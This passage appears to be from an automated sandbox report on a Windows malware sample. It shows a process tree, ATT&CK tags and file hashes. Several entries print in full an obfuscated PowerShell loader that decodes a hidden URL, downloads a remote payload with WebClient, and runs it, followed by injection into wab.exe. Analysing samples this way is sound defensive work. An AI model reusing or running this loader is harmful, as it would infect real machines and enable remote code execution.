PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
4⤵
PID:1980

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2908

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\download.vbs"
1⤵
PID:2840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1748

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
3⤵
PID:2344

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
4⤵
PID:2248

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
2KB

MD5
dca8fe4e25e478fcc79dc8d4d124cc39

SHA1
910ca595694b225075188c08d5be2bbd1e0886c4

SHA256
c17bab91c7e7271ebcf3c57e0ac1706559ebd7c0001bf541418eac8eff7794bf

SHA512
030f1b4db8d23feb708cda2252fc77de4fd3ff6bea882f4aa158ae6f37c4a22e53f922a11504b34f431f1edf8d6bfea211419df183aed24136d70de76aac7ec7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0E2259584312FC3A6059C14F978EDC79
Filesize
472B

MD5
c84ac8371fd0973d836c94791c8c72f1

SHA1
6456bdf9adfd240716fe28070012584d87cfba43

SHA256
4a31a72252a8fdb41d9430dfc647135c9db24885a34bf0a11975243efe232c44

SHA512
2f58c0652ca40ae10e20e062f0463aa87a2923108913f0af1eac5d596004492b53e297f71da62bb89f98b5dd467aeb13f78194ea96e87a54b501024f2fc81481

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
57d351bf5eb69d4b8e57c100d564a90d

SHA1
43a4fc353186137855458bc1275af613b650d00e

SHA256
2d50ce482b26ca8229095ee5944a4e0eabd45432dc3990645400ce35364d95ca

SHA512
1d3e3f23de83a23ec81aab2afeb92b3ba685fbe77c5ee965839d8aaac01f8d26250e8d57bd026ea9efecbe10edd9a8a9d439b5b9eeec5c6f8c103cb72a094063

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
Filesize
1KB

MD5
b54ee3141b59659af5e3f171445c5ece

SHA1
a63857f696eca4e315360dbbfeb2b3f83421b359

SHA256
f1b98092b580635f43d37e747b963bd80f39efbbe414633290c1be160c5ace1f

SHA512
66c1232d177c4352291f2edfbd051b40d6164c7cb7f87bc6a07408df90d53a90d67ef4f235f9ad99ab6dd3ab78cfdfaa5e5fb55b52939c3174e44cd8c4b7480b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
Filesize
488B

MD5
314ecbcf3e8e1d416aaf690e94a25421

SHA1
3eafc3d59a6dd51ce6ede6f3ce805faf6a74ea70

SHA256
a21f2b94205a208d5566f54331a7b94e9e88b49b3e333687275efe5d45e319d7

SHA512
0c897f79643795cd0f399e2d3379f2aa9c2b2a6407657d3ec8aed4134a74f164d8f5bf588199884350bd1385603cee85531e11c80c12f5797d5ee86f7f1fd2ae

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0E2259584312FC3A6059C14F978EDC79
Filesize
488B

MD5
e3202c0e9d5783ba3b8f97fc5b107af8

SHA1
34e71d838a16d808fb88816515922708cc115b34

SHA256
250ee75cf96e72eba522c216a53b8cd48c6ee6bc0ec7bd8a50b835762797cca6

SHA512
1bc0c03399c78a63d8295a6fd9bf3ebef47b288a422477c8aedfc76d3ba61e089bda52cc1391907fbb0e6d292c7cb8649ce48eb6215154220346d457de924b58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
6179a5afb705b03dee889a96825602a0

SHA1
5907b2cb50b2c451a86955afd40986035ddb1d00

SHA256
b5f09fe9ee39b0bc73c6af0496501f4e750081aea2890af48ce931f49b573816

SHA512
fb7ea1656ffeb1f8464e97213b9ec2da4f3641d1ba1d765895b85e201d9171099cf3aa1e4aa72d71d7f7c5784feaa4a8086c3e6c4ba7b490982d7c91c5681ae6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
cdc8b09dfaaa45d95a62048e372f71cc

SHA1
2f2f4087685c57baa3172ef13adab999b76d1b4d

SHA256
596945f245e208e43c71042700ec79ecfcbe851f120bc57d521869326020e110

SHA512
